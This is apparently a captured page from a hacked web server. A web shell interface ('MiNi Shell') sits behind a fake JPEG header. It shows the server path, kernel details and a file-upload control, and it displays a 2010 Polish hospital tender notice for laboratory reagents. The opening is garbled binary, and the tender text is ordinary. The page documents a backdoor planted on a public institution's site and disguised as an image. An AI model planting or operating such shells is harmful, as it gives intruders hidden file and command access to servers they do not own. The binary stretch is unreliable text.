JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100212/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100212/40108-N-2010.html

<p class="kh_header"><b>Nowe Miasto: Odczynniki laboratoryjne- zadanie nr... Nr.sprawy ZP, PN/ 3   /2010 .Nie otwierać przed dniem 02.03. 2010 r godz. 10 00 .</b><br>
<b>Numer ogłoszenia: 40108 - 2010; data zamieszczenia: 12.02.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Tomaszowska 43, 26-420 Nowe Miasto, woj. mazowieckie, tel. 048 6743842, faks 048 6740040.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zoz-nowemiasto.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odczynniki laboratoryjne- zadanie nr... Nr.sprawy ZP, PN/ 3   /2010 .Nie otwierać przed dniem 02.03. 2010 r godz. 10 00 ..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem niniejszego postępowania jest zamówienie na zakup  Produktów 
    farmaceutycznych -odczynników laboratoryjnych   do laboratorium 
    Samodzielnego Publicznego  Zakładu Opieki Zdrowotnej  w Nowym -Mieście n.P. 
  2.Przedmiot zamówienia podzielony został na 9 części. Każda ze wskazanych
     części  zamówienia określana będzie mianem (zadania).  
   1)zadanie nr 1 - Zestawy odczynników, materiały kontrolne i odczynniki 
      pomocnicze do oznaczeń hematologicznych na analizatorze  MICROS 45 OT 
      18  (firmy Horiba Medical) oznaczenie wg CPV 33696500-0 - załącznik nr 7  
      SIWZ,
   2)zadanie nr 2  - Zestawy odczynników, standardów i materiałów kontrolnych do 
      oznaczeń biochemicznych metodami manualnymi na spektrofotometrze EPOLL - 
      20 oznaczenie wg CPV 33696500-0 załącznik nr 8  SIWZ ,
   3)zadanie nr 3 - Odczynniki i kalibratory do oznaczeń biochemicznych na 
      analizatorze ADVIA  1200 oznaczenie wg CPV 33696300-8 - załącznik nr  9  
      SIWZ ,
    4)zadanie nr 4 - Płyny systemowe do analizatora biochemicznego ADVIA  1200
       oznaczenie wg CPV 33696300-8 -  załącznik nr  10  SIWZ ,
    5)zadanie nr 5 - Odczynniki, kalibratory, materiały kontrolne i akcesoria 
       pomocnicze do badań  koagulologicznych na koagulometrze K-3002 OPTIC
       oznaczenie wg CPV 33696500-0 -załącznik nr 11  SIWZ ,
     6)zadanie nr 6 -Szybkie testy lateksowe, immunochromatograficzne, 
        serologiczne, testy paskowe i materiały kontrolne do analizy moczu na 
        CLINITEK - 50 oznaczenie wg CPV 33696700-0- załącznik nr  12  SIWZ ,
      7)zadanie nr 7- Materiały kontrolne do oznaczeń biochemicznych 
         przeprowadzanych na analizatorze ADVIA 1200  oznaczenie wg CPV  
         33696300-8 - załącznik nr  13 SIWZ ,     
      9)zadanie nr 8-  Serologia grup krwi - odczynniki monoklinalne, surowice i 
         krwinki wzorcowe oznaczenie  wg CPV 33696200-7 - załącznik nr 14  SIWZ .
 3.Zamawiający dopuszcza składanie rozwiązań równoważnych o parametrach 
    techniczno - eksploatacyjnych użytkowych nie gorszych  niż podane w opisie 
    przedmiotu zamówienia. Informacje i wymagania związane z dopuszczeniem 
    rozwiązań równoważnych  znajdują się w  opisie przedmiotu zamówienia 
    wskazanym w załącznikach od  nr 7 do14 SIWZ.
  4.Zamawiający dopuszcza  składanie ofert częściowych na poszczególne zadania. 
     Jednocześnie zastrzega,że jeden wykonawca może złożyć tylko jedną ofertę 
     częściową obejmującą dowolną liczbę zadań.
  5.W trakcie postępowania wykonawcy powinni traktować poszczególne zadania 
     jako oddzielne części- np. składając zapytanie ,odwołanie należy wskazać jakiej 
     części  dotyczy. Zamawiający prowadząc postępowanie będzie dokonywał 
     czynności  związanych w postępowaniu wskazując jakiej części dotyczy.
  6.Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia w trakcie 
     realizacji umowy ilościowego zakresu opisanego przedmiotu zamówienia  
     wyszczególnionego w  poszczególnych zadaniach w granicach  + 10 %.
  7.Oferowany przez wykonawcę przedmiot zamówienia musi być dopuszczone do 
     obrotu i  używania w jednostkach służby zdrowia, spełniać wymagania 
     zasadnicze zgodne z wymaganiami  prawa wspólnotowego i polskiego, spełniać 
     wymagania jakościowe oraz posiadać odpowiednie  atesty, certyfikaty 
     deklaracje zgodności i świadectwa rejestracji..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 33.60.00.00-6, 33.69.63.00-8, 33.69.65.00-0, 33.69.70.00-0, 33.69.62.00-7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)wykazu wykonanych , a w przypadku świadczeń okresowych lub ciągłych również wykonanej minimum 1 dostawy dotyczy każdego zadania jeżeli wykonawca składa ofertę na poszczególne zadania lub całości zamówienia jeżeli wykonawca składa ofertę na wszystkie zadania ,o wartościach minimum składanej  oferty ,w zakresie niezbędnym do  wykazania spełnienia warunku wiedzy i doświadczenia, w okresie trzech lat przed upływem terminu składania ofert,  a jeżeli okres prowadzenia działalności jest krótszy -w tym okresie , z podaniem ich  daty wykonania i
odbiorców oraz załączeniem minimum 1 dokumentu potwierdzającego, że dostawy zostały wykonane lub są wykonywane należycie.
b)wykonawca składając ofertę na  wszystkie zadania będące przedmiotem  
  zamówienia  musi załączyć do oferty informację banku lub spółdzielczej kasy 
  oszczędnościowo- kredytowej potwierdzającą ,iż posiada
  środki finansowe lub zdolność kredytową do sumy przedmiotu zamówienia. 
  Informacja mówiąca tylko o obrotach na rachunku wykonawcy nie spełni warunku 
  udziału. Jeżeli wykonawca wskazując spełnienie  tego warunku polegać będzie na 
  na zdolnościach finansowych innych podmiotów na zasadach
  określonych w art 26 ust 2b ustawy zamawiający wymaga przedłożenia do oferty 
  informacji  banku lub spółdzielczej kasy oszczędnościowo-kredytowej dotyczącej 
  tych podmiotów wystawionej nie wcześniej niż 3 miesiące przed upływem terminu 
  do składania ofert;
 Sprawdzenie wymaganych warunków udziału w postępowaniu odbywać się będzie 
 na podstawie przedłożonych przez Wykonawcę wraz z ofertą dokumentów i 
 oświadczeń  potwierdzających spełnienie warunków w postępowaniu i 
 wymaganych przez Zamawiającego w dziale VII niniejszej SIWZ zgodnie z formułą
 spełnia  -  nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Opłaconej polisy ubezpieczeniowej ,  a w przypadku jej braku innego dokumentu 
potwierdzającego, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej  działalności związanej przedmiotem zamówienia na sumę 20.000,0 zł.
 Sprawdzenie wymaganych warunków udziału w postępowaniu odbywać się będzie 
 na podstawie przedłożonych przez Wykonawcę wraz z ofertą dokumentów i 
 oświadczeń  potwierdzających spełnienie warunków w postępowaniu i 
 wymaganych przez Zamawiającego w dziale VII niniejszej SIWZ zgodnie z
 formułą spełnia  -  nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">Dla przedmiotu oferty kwalifikowanego jako wyrób medyczny - oryginał lub kserokopię Rejestru produktu zamówienia i podmiotu odpowiedzialnego z za jego  wprowadzenie do obrotu wydanego  przez Prezesa Urzędu Rejestracji Produktów Leczniczych,  Wyrobów Medycznych i Produktów Biobójczych  lub złożenia kserokopii zgłoszenia przedmiotu zamówienia do Rejestru Wyrobów Medycznych zgodnie z ustawą lub deklarację  zgodności CE potwierdzającą , że oferowane wyroby medyczne spełniają  wymagania określone  w ustawie  z dnia 20 kwietnia 2004 r o wyrobach medycznych (Dz. U. Nr 93 , poz. 896 z póź. zm.) i Rozporządzenia Ministra Zdrowia z dnia 3 listopada  2004 r o wyrobach zasadniczych dla diagnostyki in virto.  (Prosimy oznaczyć ,które dokumenty dotyczą
 którego zadania)</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dokument potwierdzający uprawnienie osoby do występowania w imieniu Wykonawcy (np.pełnomocnictwo do reprezentowania ,o ile ofertę składa pełnomocnik ,uchwałę wspólników spółki,konsorcjum) o ile wynika to z załączonych dokumentów. Pełnomocnictwo powinno być złożone w formie oryginału lub kopii sporządzonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Dopuszcza się zmianę umowy w zakresie przedmiotowym tj. zastąpienie produktu
   objętego umową   odpowiednikiem w przypadku: 
   a)zaprzestania wytwarzania produktu objętego umową ,
   b)wygaśnięcia świadectwa rejestracji 
 1)Zmiana, o której mowa w ust. 1 będzie dopuszczalna pod warunkiem, iż 
    odpowiednik przy tej samej cenie będzie kompatybilny z warunkami opisanego 
    produktu ,który zastępuje.
 2)Zmiany, o których mowa wyżej mogą dotyczyć nadto sposobu konfekcjonowania
    produktu i wielkości jednostkowej opakowania przy zachowaniu tej samej ceny
 3)Jeżeli Wykonawca dostarczający przedmiot zamówienia zmienił dane firmy (np. 
    w  wyniku przekształceń, przejęć itp.) możliwe jest sporządzenie aneksu do 
    umowy zmieniającego dane firmy.
 4)W przypadku zmiany obowiązujących przepisów prawnych mających 
    zastosowanie przy udzielaniu zamówień publicznych, treść umowy będzie 
    zmieniała się stosownie do wprowadzonych rozwiązań prawnych.
 5)W przypadku, gdy nastąpiła zmiana stawki podatku VAT cena netto nie ulegnie 
    zmianie, nastąpi jedynie zmiana ceny brutto 
 6)W przypadku zmiany wskaźnika wzrostu cen  i usług konsumpcyjnych 
    ogłoszonego  przez Główny Urząd Statystyczny cena ulegnie zmianie o wielkość 
    tegoż wskaźnika.
2.W razie wystąpienia istotnej zmiany okoliczności powodującej, że wykonanie 
   umowy nie leży w interesie publicznym, czego nie można było przewidzieć w 
   chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 30 dni 
   od powzięcia wiadomości o tych okolicznościach. W takim przypadku Wykonawca
    może żądać jedynie wynagrodzenia należnego mu z tytułu wykonania części 
   umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zoz-nowemiasto.net<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Tomaszowska 43 26-420 Nowe-Mioasto n.P. Koszt 30 zł po wpłacie na konto Bank Spółdzielczy Belsk Duży 75 9116 0001 0001 4616 2000 0001.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.03.2010 godzina 09:30, miejsce: Samodzielny Publiczny Zakłąd Opieki Zdrowotnej  ul. Tomaszowska 43 26-420 Nowe-Miasto n.P - budynek administracyjny (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com